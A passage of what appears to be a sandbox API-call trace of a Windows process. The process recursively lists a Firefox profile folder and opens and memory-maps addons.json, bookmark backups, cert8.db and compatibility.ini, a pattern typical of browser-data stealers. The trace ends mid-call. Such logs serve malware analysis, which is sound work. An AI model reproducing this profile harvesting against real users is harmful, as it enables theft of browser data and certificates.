0x5dbdf0 [0590.812] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 0x5a [0590.812] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.812] CloseHandle (hObject=0x4c8) returned 1 [0590.812] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.812] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa [0590.812] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.812] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.812] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.813] CloseHandle (hObject=0x660) returned 1 [0590.813] CloseHandle (hObject=0x4c8) returned 1 [0590.813] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.813] LocalFree (hMem=0x56cab0) returned 0x0 [0590.813] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 0 [0590.813] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.813] LocalFree (hMem=0x5ed570) returned 0x0 [0590.813] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.813] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 1 [0590.813] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0590.813] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.813] lstrlenW (lpString="") returned 0 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.813] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0590.813] lstrlenW (lpString="Profiles") returned 8 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.813] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5d7c90 [0590.813] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.813] lstrlenW (lpString="\\*.*") returned 4 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.813] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5e6108 [0590.813] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 0x57ca60 [0590.813] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.813] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 1 [0590.813] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.813] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.813] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 1 [0590.813] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0590.813] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.813] lstrlenW (lpString="\\") returned 1 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.813] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x63f8c8 [0590.813] lstrlenW (lpString="3y2joh8o.default") returned 16 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 59 [0590.813] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63d588 [0590.813] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.813] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.813] lstrlenW (lpString="\\*.*") returned 4 [0590.814] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.814] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d6b0 [0590.814] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 0x57c9a0 [0590.814] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.814] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.814] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.814] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.814] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.814] lstrlenW (lpString="\\") returned 1 [0590.814] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.814] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.814] lstrlenW (lpString="addons.json") returned 11 [0590.814] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.814] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.814] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.814] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.814] CloseHandle (hObject=0x660) returned 1 [0590.814] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.814] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.814] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0590.814] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.814] CloseHandle (hObject=0x660) returned 1 [0590.814] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.814] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0590.814] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.814] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.815] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.815] CloseHandle (hObject=0x668) returned 1 [0590.815] CloseHandle (hObject=0x660) returned 1 [0590.815] LocalFree (hMem=0x63bd28) returned 0x0 [0590.815] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.815] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.815] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0590.815] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.815] lstrlenW (lpString="\\") returned 1 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.815] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.815] lstrlenW (lpString="bookmarkbackups") returned 15 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.815] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.815] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.815] lstrlenW (lpString="\\*.*") returned 4 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.815] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0590.815] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.815] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.815] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.815] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.815] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.815] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.815] lstrlenW (lpString="\\") returned 1 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.815] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbf38 [0590.815] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0590.815] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.815] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.815] LocalFree (hMem=0x5dbf38) returned 0x0 [0590.815] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.815] CloseHandle (hObject=0x668) returned 1 [0590.816] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.816] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63fa40 [0590.816] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x63fa40, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0590.816] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.816] CloseHandle (hObject=0x668) returned 1 [0590.816] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.816] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.816] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.816] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.816] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.816] CloseHandle (hObject=0x66c) returned 1 [0590.816] CloseHandle (hObject=0x668) returned 1 [0590.816] LocalFree (hMem=0x63fa40) returned 0x0 [0590.816] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.816] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.816] lstrlenW (lpString="\\") returned 1 [0590.816] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.816] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbf38 [0590.816] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0590.817] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.817] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.817] LocalFree (hMem=0x5dbf38) returned 0x0 [0590.817] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.817] CloseHandle (hObject=0x668) returned 1 [0590.817] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.817] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63fa40 [0590.817] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x63fa40, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0590.817] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.817] CloseHandle (hObject=0x668) returned 1 [0590.817] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.817] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.817] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.817] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.817] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.817] CloseHandle (hObject=0x66c) returned 1 [0590.817] CloseHandle (hObject=0x668) returned 1 [0590.818] LocalFree (hMem=0x63fa40) returned 0x0 [0590.818] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.818] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0590.818] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.818] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.818] LocalFree (hMem=0x56cab0) returned 0x0 [0590.818] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.818] lstrlenW (lpString="\\") returned 1 [0590.818] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.818] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.818] lstrlenW (lpString="cert8.db") returned 8 [0590.818] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.818] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.818] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.818] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.818] CloseHandle (hObject=0x660) returned 1 [0590.818] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.818] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.818] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0590.818] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.818] CloseHandle (hObject=0x660) returned 1 [0590.818] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.818] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.818] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.818] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.819] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.819] CloseHandle (hObject=0x668) returned 1 [0590.819] CloseHandle (hObject=0x660) returned 1 [0590.819] LocalFree (hMem=0x63bd28) returned 0x0 [0590.819] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.819] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.819] lstrlenW (lpString="\\") returned 1 [0590.819] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.819] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.819] lstrlenW (lpString="compatibility.ini") returned 17 [0590.819] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.819] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.819] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.819] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.819] CloseHandle (hObject=0x660) returned 1 [0590.820] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.820] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.820] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x5dbdf0, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0590.820] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.820] CloseHandle (hObject=0x660) returned 1 [0590.820] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.820] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0590.820] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.820] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.820] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.820] CloseHandle (hObject=0x668) returned 1 [0590.820] CloseHandle (hObject=0x660) returned 1 [0590.820] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.820] LocalFree (hMem=0x56cab0) returned 0x0 [0590.820] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.820] lstrlenW (lpString="\\") returned 1 [0590.820] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.820] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.820] 